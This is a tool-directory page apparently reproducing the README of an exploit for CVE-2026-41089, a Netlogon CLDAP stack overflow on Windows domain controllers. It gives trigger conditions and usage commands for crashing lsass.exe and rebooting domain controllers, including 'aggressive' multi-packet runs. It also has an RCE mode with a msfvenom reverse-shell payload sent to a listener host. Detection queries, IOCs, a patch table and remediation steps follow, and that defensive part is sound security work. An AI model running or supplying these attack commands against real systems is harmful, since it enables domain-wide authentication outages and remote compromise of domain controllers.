Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-41089 — CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。 | Kitploit
Tools/GitHubGitHub/hnytgl/cve-2026-41089
Vulnerability AnalysisExploitationPenetration TestingRemote Access ToolBinary Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。

View Repository
1412223 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
Attack Vector: UDP/389 (CLDAP SearchRequest)
Impact: Remote Code Execution (RCE) / Denial of Service (DoS)
Affected Versions: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
Patch: May 2026 Cumulative Update

Vulnerability Overview

The NetpLogonPutUnicodeString function in netlogon.dll contains a stack buffer overflow vulnerability when processing CLDAP search requests. The function receives a byte-length budget but interprets it as a WCHAR count, causing the write amount to be 2x the expected size.

The overflow occurs in the 528-byte (264 ushort) fixed stack buffer of the NlGetLocalPingResponse function. The attacker-controlled User field combined with the server's own DNS domain name fills this buffer, ultimately overwriting the GS security cookie, leading to __report_gsfailure and a crash of lsass.exe.

Trigger Conditions

  • NtVer=0x02 in the CLDAP SearchRequest (forces use of the legacy, vulnerable BuildSamLogonResponse path)
  • User field length ≥ ~130 characters (binary upper limit approximately 260 bytes UTF-16)
  • Server DNS domain name length ≥ ~80 characters (the longer the domain name, the easier it is to reach the cookie)

Note: NtVer=0x16 (the value used by many public detection scripts) triggers the safe BuildSamLogonResponseEx path and does not trigger the vulnerability.

Features

ModeDescription
--mode dosSends a crafted CLDAP packet, causing LSASS to crash and the DC to reboot (~60 seconds of authentication disruption)
--mode rceAttempts remote code execution (research-grade, requires shellcode)
--mode scanScans responses for different NtVer values to fingerprint the target DC
--mode autoAutomatically detects and selects the best attack strategy

DoS Mode

A single packet can crash lsass.exe, causing the domain controller to reboot within approximately 30-60 seconds. During this period, all domain authentication for that DC will fail.

# Basic usage — send 3 packets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Single-packet quick attack
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Aggressive mode — 5 concurrent packets
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

RCE Mode

⚠️ Research-grade — unreliable and unstable in real-world environments.

RCE faces the following challenges:

  1. The overflow data is the server's own DNS name, not the attacker's shellcode
  2. The GS Cookie must be bypassed (requires an info leak primitive or brute force)
  3. CET/ACG/CFG on Server 2022+ makes traditional ROP more difficult
# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Send RCE chain
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Scan Mode

# Fingerprint the target DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Example expected output (patched target):

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Example expected output (unpatched target):

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

If NtVer=0x02 times out while other versions respond normally, the target is very likely vulnerable.

Advanced Parameters

ParameterDescriptionDefault
-l, --user-lenUsername field length (ASCII characters)180
--ntverNtVer value (hex, e.g. 0x02)0x02
--countNumber of DoS packets to send3
--delayDelay between packets (seconds)0.5
-t, --timeoutSocket timeout (seconds)5.0
--jsonOutput results in JSON format—
--rawPrint raw packet hex before sending—
--quietSuppress banner output—
--shellcode-fileCustom shellcode file (raw x64)—
--lhostReverse shell listener address—
--lportReverse shell listener port4444

Setting Up a Test Environment

# Create a long-domain-name DC on Windows Server (unpatched):
# 1. Promote to domain controller (a domain with a very long DNS domain name, e.g. "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Confirm that patches prior to May 2026 are installed
# 3. Run from the attack machine:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Observe the DC crash and reboot

Indicators of Compromise (IOCs)

Network

  • CLDAP SearchRequest on UDP/389 with User > 100 bytes and NtVer = 0x02
  • Abnormal CLDAP traffic sent to a DC from a non-domain-controller host

Host

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Detection Rules

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Patch Information

Windows Server VersionPatched Build NumberNotes
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Detection and Remediation Guide

Quick Detection (Non-Destructive)

# Safe detection script — will not crash the target
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# JSON output (suitable for batch scanning)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# Show patch verification steps
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

Detection principle: Send short CLDAP requests with NtVer=0x02 (triggers the vulnerable path) and NtVer=0x16 (safe path). If 0x02 times out but 0x16 responds normally, the target is very likely vulnerable.

Remediation Steps

  1. Install the patch immediately: May 2026 Cumulative Update (KB5058405 or later)

    # Check installed updates
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # Install the latest updates
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
  2. Verify the netlogon.dll version:

    (Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
    # Compare against the patch version table above
    
  3. Temporary mitigation (when patching cannot be done immediately):

    • Restrict inbound UDP/389 at the firewall, allowing only trusted network segments to access the DC
    • Deploy IDS rules to detect abnormal CLDAP requests (User field > 100 bytes + NtVer=0x02)
    • Enable Credential Guard and HVCI to reduce the impact of RCE
  4. Post-incident investigation:

    # Check lsass crash records
    Get-WinEvent -FilterHashtable @{LogName='Application';Id=1000} |
      Where-Object {$_.Message -match 'lsass.exe' -and $_.Message -match '0xc0000409'} |
      Select-Object TimeCreated, Message -First 5
    

Sigma Detection Rule

Download Tool